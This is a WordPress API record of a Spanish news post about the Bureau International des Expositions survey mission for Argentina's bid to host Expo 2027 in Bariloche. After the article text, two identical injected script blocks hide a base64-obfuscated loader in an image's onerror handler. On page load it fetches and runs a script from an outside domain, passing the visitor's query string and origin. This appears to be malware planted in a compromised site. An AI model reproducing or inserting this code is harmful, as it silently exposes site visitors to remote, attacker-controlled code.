{"id":1706,"date":"2022-11-01T19:39:41","date_gmt":"2022-11-01T22:39:41","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1706"},"modified":"2025-08-14T00:31:36","modified_gmt":"2025-08-14T03:31:36","slug":"argentina-avanza-en-la-candidatura-para-organizar-la-expo-especializada-en-san-carlos-de-bariloche-en-2027","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1706","title":{"rendered":"Argentina avanza en la candidatura para organizar la Expo Especializada en San Carlos de Bariloche en 2027"},"content":{"rendered":"\n<h4 class=\"has-white-color has-vivid-cyan-blue-background-color has-text-color has-background wp-block-heading\"><em><strong>Representantes del Bureau International des Expositions (BIE) realizaron la Misi\u00f3n de Encuesta<\/strong>\u00a0como parte del examen de la\u00a0<strong>candidatura de Argentina para organizar la Expo Especializada en San Carlos de Bariloche en 2027 bajo el lema \u201cNaturaleza + Tecnolog\u00eda = Energ\u00eda Sostenible. Un futuro viable para la humanidad\u201d<\/strong><\/em>.<\/h4>\n\n\n\n<p>Los miembros de la Misi\u00f3n de Investigaci\u00f3n, encabezada por el Presidente del Comit\u00e9 Ejecutivo de BIE,&nbsp;<strong>Alain Berger<\/strong>, analizaron todos los aspectos del proyecto Expo presentado por Argentina y expuesto en su dossier de candidatura. La delegaci\u00f3n estuvo compuesta por delegados de tres Estados miembros del BIE, el Secretario General del BIE,&nbsp;<strong>Dimitri Kerkentzes<\/strong>, y funcionarios.<\/p>\n\n\n\n<p>En el transcurso de cinco d\u00edas en la Rep\u00fablica Argentina<strong>, los miembros de la Misi\u00f3n recibieron presentaciones detalladas del proyecto de candidatura, visitaron el sitio propuesto para la Expo e intercambiaron opiniones con funcionarios nacionales y locales, as\u00ed como con representantes de la comunidad empresarial y miembros de la sociedad civil<\/strong>.<\/p>\n\n\n\n<p>El dossier de candidatura presentado por Argentina describe una visi\u00f3n para una Exposici\u00f3n Especializada para avanzar hacia un \u201cnuevo comienzo\u201d con la energ\u00eda humana en el centro, ocupando su lugar en la naturaleza mientras genera tecnolog\u00edas para mejorar la calidad de vida. La Expo se realizar\u00eda entre el 1\u00b0 de febrero y el 30 de abril de 2027 en un predio ubicado sobre la Ruta Nacional 40 de Argentina dentro del Parque Tecnol\u00f3gico Bariloche al este de la ciudad. El comit\u00e9 de candidaturas prev\u00e9 que 85 pa\u00edses, adem\u00e1s de organismos internacionales y ONGs, participen en la Expo y que reciba 4,3 millones de visitas durante sus tres meses de apertura.<\/p>\n\n\n\n<p>Tomando en consideraci\u00f3n las observaciones y conclusiones realizadas por la Misi\u00f3n en el cuerpo del informe,&nbsp;<strong>\u00e9sta concluy\u00f3 que el proyecto es viable y conforme a las normas del BIE.<\/strong><\/p>\n\n\n\n<p><strong>Del informe recibido surge que, el tema propuesto de la Expo \u201cNaturaleza + Tecnolog\u00eda = Energ\u00eda Sostenible. Un futuro viable para la humanidad\u201d es altamente leg\u00edtimo para el pa\u00eds y la ciudad anfitriones, quienes son contribuyentes y promotores activos en los campos de la ciencia y la tecnolog\u00eda y cuentan con un fuerte apoyo institucional y del sector privado en estas \u00e1reas. La ciudad de Bariloche y la regi\u00f3n patag\u00f3nica que la rodea est\u00e1n dotadas de paisajes naturales, lo que la convierte en un lugar propicio para reflexionar sobre la naturaleza y el medio ambiente, as\u00ed como sobre c\u00f3mo la humanidad interact\u00faa e impacta con la naturaleza.&nbsp;<\/strong>Adem\u00e1s, el tema es oportuno y puede atraer a un gran n\u00famero de pa\u00edses, ya que presta especial atenci\u00f3n a las cuestiones ambientales y energ\u00e9ticas, as\u00ed como a las transformaciones humanas, econ\u00f3micas y sociales.<\/p>\n\n\n\n<p><strong>Adem\u00e1s, la Misi\u00f3n destac\u00f3 el fuerte consenso pol\u00edtico y social en torno al proyecto de la Exposici\u00f3n.&nbsp;<\/strong>El apoyo ha llegado con fuerza en todos los niveles y sectores, que ven en la Expo una oportunidad \u00fanica para elevar el perfil de Bariloche como polo cient\u00edfico, tecnol\u00f3gico y tur\u00edstico. Adem\u00e1s, los planes heredados para reutilizar los edificios de la Expo e integrarlos en el tejido del complejo cient\u00edfico y tecnol\u00f3gico y sus alrededores han suscitado un gran entusiasmo y apoyo.<\/p>\n\n\n\n<p>Por \u00faltimo, desde una perspectiva local y regional, los miembros del BIE han remarcado que la Expo representar\u00eda un hito hist\u00f3rico y realzar\u00eda el perfil cient\u00edfico, t\u00e9cnico y productivo de Bariloche en un marco natural \u00fanico.<\/p>\n\n\n\n<p>Cabe destacar que en agosto pasado los miembros de la Misi\u00f3n de Investigaci\u00f3n se reunieron con el Presidente de la Naci\u00f3n Argentina,&nbsp;<strong>Alberto Fern\u00e1ndez<\/strong>, y tambi\u00e9n con diferentes funcionarios nacionales, como el canciller&nbsp;<strong>Santiago Cafiero<\/strong>.<\/p>\n\n\n\n<p>En junio de 2023, durante la 172\u00aa Asamblea General del BIE, el pa\u00eds anfitri\u00f3n de la Expo Especializada 2027\/28 ser\u00e1 elegido por votaci\u00f3n secreta por los Estados miembros del BIE, seg\u00fan el principio de un pa\u00eds, un voto.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Representantes del Bureau International des Expositions (BIE) realizaron la Misi\u00f3n de Encuesta\u00a0como parte del examen de la\u00a0candidatura de Argentina para organizar la Expo Especializada en San Carlos de Bariloche en 2027 bajo el lema \u201cNaturaleza + Tecnolog\u00eda = Energ\u00eda Sostenible. Un futuro viable para la humanidad\u201d. Los miembros de la Misi\u00f3n de Investigaci\u00f3n, encabezada por [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1707,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,21],"tags":[],"class_list":{"0":"post-1706","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1706"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1706"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1706\/revisions"}],"predecessor-version":[{"id":7295,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1706\/revisions\/7295"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1707"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1706"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1706"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1706"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}